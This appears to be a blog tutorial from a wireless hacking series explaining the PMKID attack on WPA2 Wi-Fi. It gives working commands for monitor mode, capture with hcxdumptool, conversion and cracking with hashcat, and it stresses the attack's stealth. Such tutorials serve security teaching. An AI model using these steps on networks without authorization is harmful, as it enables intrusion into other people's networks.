Hack That Shit
PMKID Attack – Crack Wi-Fi Without a Handshake

PMKID Attack – Crack Wi-Fi Without a Handshake

by

Introduction

Up to now, you’ve learned how to capture WPA2 handshakes and brute-force them with wordlists. But what if you could skip the client deauthentication entirely and grab something even faster?

Welcome to the PMKID attack — a stealthy method that lets you crack WPA2 without any connected clients.

❓ What is a PMKID?

PMKID (Pairwise Master Key Identifier) is part of WPA2’s authentication protocol. Some routers (especially with 802.11r roaming enabled) send the PMKID when the client probes the AP.

The PMKID contains:

  • MAC of the AP

  • MAC of the client (can be faked)

  • PMKID hash (our target)

This can be captured and cracked just like a WPA2 handshake, but more easily — and without forcing disconnects.

🧰 Tools Needed

  • Kali Linux (or custom Pentesting OS)

  • Wi-Fi adapter in monitor mode

  • hcxdumptool – for PMKID capture

  • hcxpcapngtool – to extract PMKID

  • Hashcat – to crack it

Step-by-Step: PMKID Attack Using hcxdumptool + Hashcat

1. Put Adapter in Monitor Mode

You can manually set your adapter to monitor mode with:

sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

Or use the simpler method via airmon-ng:

sudo airmon-ng start wlan0

2. Capture PMKID Using hcxdumptool

Start scanning for PMKID handshakes:

sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

This will begin capturing data. Let it run for a few minutes.

✅ Look for output like:

FOUND PMKID

3. Convert the Capture for Hashcat

Convert the .pcapng file into a Hashcat-compatible format using hcxpcapngtool:

hcxpcapngtool -o pmkid_hash.hc22000 -E ssidlist.txt -I identity.txt -U user.txt -T taglist.txt pmkid.pcapng

This will generate a .hc22000 file ready for cracking.

4. Crack Using Hashcat

Now run Hashcat with your wordlist:

hashcat -m 22000 pmkid_hash.hc22000 /path/to/wordlist.txt

Explanation:

  • -m 22000: WPA-PMKID hash type
  • pmkid_hash.hc22000: Converted capture file
  • /path/to/wordlist.txt: Your chosen wordlist (e.g., rockyou.txt)

If the password is in your wordlist, Hashcat will reveal it:

<network MAC>:<client MAC>:password123

Why PMKID Attack Rocks?

  • Doesn’t need clients to be connected

  • No noisy deauthentication packets

  • Faster, stealthier than handshake capture

  • Great for rogue APs or weak setups

Real-World Considerations

  • Not all routers are vulnerable (802.11r support required)

  • PMKID often available on modern routers, but not guaranteed

  • Password cracking still depends on wordlist quality

Ethics Reminder

This is a powerful technique. Only use it in lab environments or on networks you own or have written permission to test. Unauthorized attacks are illegal.

Wrapping Up

The PMKID attack is a slick, modern WPA2 exploitation method that skips the handshake drama and gives you what you need — fast. Combined with Hashcat, it’s a must-have skill in your wireless hacking toolkit.

Next up:
🎭 Part 10 – Evil Twin Attack with Fluxion: Phishing Wi-Fi Passwords with a Fake Access Point

1 thought on “PMKID Attack – Crack Wi-Fi Without a Handshake”

  1. Pingback: Bruteforcing WPA2 with Hashcat & GPU Power

Leave a comment

Table of Contents

Index